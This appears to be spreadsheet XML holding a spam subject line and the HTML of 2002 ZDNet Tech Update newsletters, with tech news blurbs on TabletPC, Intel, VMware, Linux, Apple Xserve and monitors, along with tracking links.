    <t xml:space="preserve">Subject: EASY CREDIT REPAIR SOFTWARE IS HERE!!!             11781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</si>
  <si>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href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyTdfwrXydit0M-0OvrR"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href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMyjcSC41H99K8FZuSiR"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17, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GRNYYobHCu4jNix1DPPR" &gt;
 &lt;b&gt;Where TabletPC will succeed--and why&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 OK, OK, you readers were right all along. I now believe that Microsoft"s TabletPC can be a big hit. Where? Vertical markets. Why? Development tools.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XVjSr3AAwQ4lAUw-5WnR" &gt;
 	 &lt;b&gt;Why you won't be buying one from Dell&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=00-4FQlI9QkZj6QEHRbgi4cHr7W6TiR" &gt;CERT: Security reports multiplying&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck2jxbKM_AV-hDEc2lRbPR" &gt;Microsoft squashes Windows 2000 bugs
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzgGOfNabman8WccrYnR" &gt;Sun's ID software gets a Liberty face-lift
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSI0sByYHcoh57BymNzeR" &gt;Mobile slump puts the bite on Bluetooth&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72_Wa-u0O9U4lR0vdksR" &gt;'Rainbow' coalition to spread wireless
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=69-CY-iIoWgaOiklWFMoAH4OpRzLxFR" &gt;Handspring courts corporate buyers&lt;/a&gt;&lt;br&gt;
  &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7BbTQwi6pURwMpopr9R" &gt;Apple patches serious security hole&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3V2anHjcTYjvQ8Rgn5rR"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Slowing sales shrinking Intel workforce&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Intel announced lower-than-expected earnings yesterday and that &lt;b&gt;4,000 jobs&lt;/b&gt; (5 percent of its staff) would be eliminated this year. This may bring Intel's margins back in line, but the overall &lt;b&gt;outlook is not bright&lt;/b&gt; in the coming months, despite Federal Reserve Chairman Alan Greenspan's optimism about a more timely recovery.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxnPyb8eOz2JQZv91zVMlR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;VMware ups consolidation ante&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The new version of VMware's lower-end server product is slated to run atop the latest versions of Linux  from SuSE, 
 MandrakeSoft and Red Hat, as well as Microsoft Windows .Net Server due this year. Offering more Intel-server based 
 &lt;b&gt;consolidation opportunities&lt;/b&gt; than ever, &lt;b&gt;GSX Server 2.0&lt;/b&gt; includes support for AMD's &lt;b&gt;Athlon XP&lt;/b&gt; and &lt;b&gt;Intel's Xeon&lt;/b&gt; 
 processors.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTplAy-_pbnY9y52GfwH4R" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBLbx02K74p01K7fy3rR" &gt;
 &lt;b&gt;Server consolidation eases system management&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 3 --&gt;
   &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602techsupport.gif" width="220" height="280" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;Software contracts: Clause for alarm&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the high-stakes game of corporate software negotiations, the silver-tongued sales rep isn't your biggest challenge: It's 
 the &lt;b&gt;language in the contracts&lt;/b&gt;. Enterprise customers spend surprisingly little time pouring over the fine print of 
 multi-million dollar software contracts that are rife with obscure terminology, vague expansion charges, and &lt;b&gt;mind-boggling 
 license conversions&lt;/b&gt;. As a result, they end up paying in ways they had never imagined long after the deal is signed. Just 
 ask California.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQHPf6FrAP_kMFIM55iR" &gt;
 &lt;b&gt;Read the fine print&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Six steps to the best TCO with Linux&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Don't just bring in Linux as yet another OS to manage. To help you determine whether Linux offers better TCO than Windows, 
 &lt;b&gt;Gartner&lt;/b&gt; examines the benefits and pitfalls of deploying Linux-based servers.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1rPKVr_O_Iti64Q9t8PR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/bobrien.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Rack server a la mode&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 With its Xserve rack-mount server, &lt;b&gt;Apple is moving into enterprise territory&lt;/b&gt;. The specs are impressive: Dual 1GHz 
 PowerPC G4s, up to 2GB DDR SDRAM, two 64-bit 66MHz PCI slots (plus a third combination PCI/AGP slot), dual Gigabit Ethernet, 
 FireWire and USB ports, and four Ultra ATA/100 Apple Drive Module bays. But &lt;b&gt;Bill O'Brien&lt;/b&gt; thinks Apple's 
 &lt;b&gt;licensing&lt;/b&gt; may be even more appealing than the hardware.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrs-Xbl-pEvKY-qkCKnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 6--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602winbook.jpg" width="220" height="207" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;A notebook with desktop muscle&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;WinBook's&lt;/b&gt; big and heavy J4 uses a desktop Pentium 4 and leaves mobile P4-M notebooks in the dust. That means heavy 
 lifting for your spreadsheets--and your shoulders. If you travel only occasionally and need &lt;b&gt;top performance&lt;/b&gt;, this 
 might be the sole computer for you. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9uKdFFSkMRUVolYrBeR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YT_04JZvwlGWUTnaNtPR"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href="http://clickthru.online.com/Click?q=52-LUXoIrJtd9bPZtsMWz8AtIQwjjnR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyXkspcWhKPAKa1CPIuR" &gt;
 &lt;b&gt;Top 10 Web services security requirements&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Security is a critical, yet often overlooked, aspect of &lt;b&gt;Web services development&lt;/b&gt;. Consider these requirements when 
 working with your next project. 
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;DOWNLOADS&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc3qxBXpfLHDx1984BOsR" &gt;
 &lt;b&gt;Stamp out the bugs&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Does your code need a once-over? &lt;b&gt;Debug your software&lt;/b&gt; with this collection of tools and utilities designed to locate 
 and correct programming mistakes, track defects, and more.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQDpaaRMzb-Byo4hJdlR" &gt;
 &lt;b&gt;Bridging the gap between Liberty and Microsoft&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It appears that we are closer to a &lt;b&gt;solution for single sign-on&lt;/b&gt;. But what if Microsoft chooses not to support Liberty's specifications?
 &lt;P&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOWNCCaOvAKcnvjbgw4R" &gt;
 &lt;b&gt;Microsoft stresses security for Exchange&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The software giant plans to improve the Exchange Server e-mail system in the software's first &lt;b&gt;major upgrade&lt;/b&gt; in nearly 
 two years.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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7w7iTFXRaT-Dc13yE_rR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8jxtnLB7c7YuNDxuyCiR" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDK1PMPRXGugH6NQYvU4R" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkgqrbw0XpCoFokcTbTDoVrR" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAr9xI2PffACEH5fCAiR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXXmzA5pDZTscR7jeQrFPR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8GBoi87JR1rqAFZcCnR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81v_yS2S8g-rrsLKFK0uR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZVIMWeNGWF8w6YrPhsR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=79-rsQHIEBf9Lj-XyVmFz_e0CvgpaFR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTCcMiQPDuYWD0V_Wy4R" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYDHGeSfQffN5r5ls4rR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXmHB--h8FdMkmoOwzlR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOogUDSP3ufz1Jey2fP4R" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=e3-zeDWrSVPQAL2bLNCKtDeWAQTvr4_pRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnX9RFW3piaRL6DCwoliR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGYTC2fNv0T0QkY6b7PR"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href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_cRyT0uo4I9yc99NcnR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4e5TWsMQ93KjZ6eJcneR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbkXLD9yAu7hgvo2AKesR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOoMainG9TmIKJ15BRdR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsCMz-fvhx31g9NPmdZPuR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notn6ugXgIiSupcptbPMPR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3zN1YxE9R0CGk_HtsonR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxsq9h1Op0NpbnpTbdL3eR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq56N8COW7qeZDozn6f5yR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=e2-J1Dp-XyJ69zYJbNJ-NoBM4w159RR"&gt;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</si>
  <si>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href="http://clickthru.online.com/Click?q=9d-kkCWQv0umMiPm9RuKLvd75wKZzPR" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
        &lt;div align="center"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeVECndAE64qDAwrPGrR" target="new"&gt;
 &lt;img src="http://www.techrepublic.com/images/ads/AMDProcessingSky.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDv4YnmMKE-nFr99H2iR"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10, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3DVf1zgGZP85eXsJh-PR" &gt;
 &lt;b&gt;What to look for in your next smart phone&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 With PDAs and cell phones on the fast path to convergence, choosing the right 
 device is harder than ever. Before you buy one more handheld, see my prescription 
 for mobile happiness.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCe34s_A0pvVdi5Z7ednR" &gt;
 	 &lt;b&gt;Reader: Kyocera is stepping stone to the perfect smart phone&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=07-HqCzI5rq9Ttfx8KiqzUbrvLkiDeR" &gt;Microsoft eyes Visa users with Passport&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr43m35wPjn9kgGa2oXqGyR" &gt;No jitters here: IBM drives tap new tech&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsD07nCayyLxjkqVAXXblR" &gt;Telecom firm leaks student data to Web&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDSNb7Qsta1cN0535V0Y9R" &gt;Israel, Hong Kong hotbed for cyberattacks&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUXl_6moxCjjvDSwizzcR" &gt;Microsoft puts content software to the test&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHsVddAqwuBXvl3NU2FR" &gt;Micron: PC demand to boost chip sales&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonnkOZ9JSjaeTldfVpf4R" &gt;Flash! Macromedia tools speak up&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2pUpd1d0dAVJ9PZAKTrR" &gt;Will Dell delve into printers?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-S9XoW6dxQMKtNX8PQiR" &gt;&lt;b&gt;More Enterprise News&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/td&gt;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src="http://techupdate.zdnet.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Tackling tough issues in e-customer service&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Identity services let e-commerce sites better serve customers and secure their 
 transactions. Both &lt;b&gt;Passport&lt;/b&gt; and the &lt;b&gt;Liberty Alliance&lt;/b&gt; offer merchants 
 some ability to recognize customers. Check out this overview of today's identity 
 services--and find out why &lt;b&gt;PKI&lt;/b&gt; is not dead yet. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-czTk_zSROUJEymxqPR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="150" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
